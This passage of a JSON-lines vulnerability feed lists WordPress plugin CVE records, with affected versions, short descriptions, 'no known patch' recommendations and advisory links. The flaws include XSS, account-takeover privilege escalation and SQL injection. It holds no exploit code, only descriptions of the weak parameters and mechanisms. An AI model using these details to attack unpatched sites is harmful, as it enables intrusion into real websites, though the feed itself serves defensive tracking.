merce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L655\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L655\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L658\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L658\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa3909f6-fd2f-44e7-83b5-51c8cda4b20f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa3909f6-fd2f-44e7-83b5-51c8cda4b20f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13822","slug":"totalcontest-lite","versionImpact":"2.8.1","description":"The Photo Contest  | Competition | Video Contest WordPress plugin through 2.8.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1f0f1553-1987-428c-9fe3-ffb3f6b0aecc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1f0f1553-1987-428c-9fe3-ffb3f6b0aecc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3746","slug":"otpless","versionImpact":"2.0.59","description":"The OTP-less one tap Sign in plugin for WordPress is vulnerable to privilege escalation via account takeover in versions 2.0.14 to 2.0.59. This is due to the plugin not properly validating a user's identity prior to updating their details, like email. This makes it possible for unauthenticated attackers to change arbitrary users' email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.\r\nAdditionally, the plugin returns authentication cookies in the response, which can be used to access the account directly.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otpless\\\/tags\\\/2.0.59.\\\/includes\\\/class-login.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otpless\\\/tags\\\/2.0.59.\\\/includes\\\/class-login.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63fab608-1a75-4b07-8d82-8ab87e197547?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63fab608-1a75-4b07-8d82-8ab87e197547?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11269","slug":"ahathat","versionImpact":"1.6","description":"The AHAthat Plugin WordPress plugin through 1.6 does not sanitize and escape a parameter before using it in a SQL statement, allowing Admin to perform SQL injection attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ad89687-adb0-4c45-938c-0c18fda7f36f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ad89687-adb0-4c45-938c-0c18fda7f36f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7439","slug":"anber-elementor-addon","versionImpact":"1.0.1","description":"Anber Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the $anber_item['button_link']['url']\u2019 parameter in all versions up to, and including, 1.0.1 to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/anber-elementor-addon\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/anber-elementor-addon\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb46d7fa-9667-4479-8136-837cb61eaf4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb46d7fa-9667-4479-8136-837cb61eaf4c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}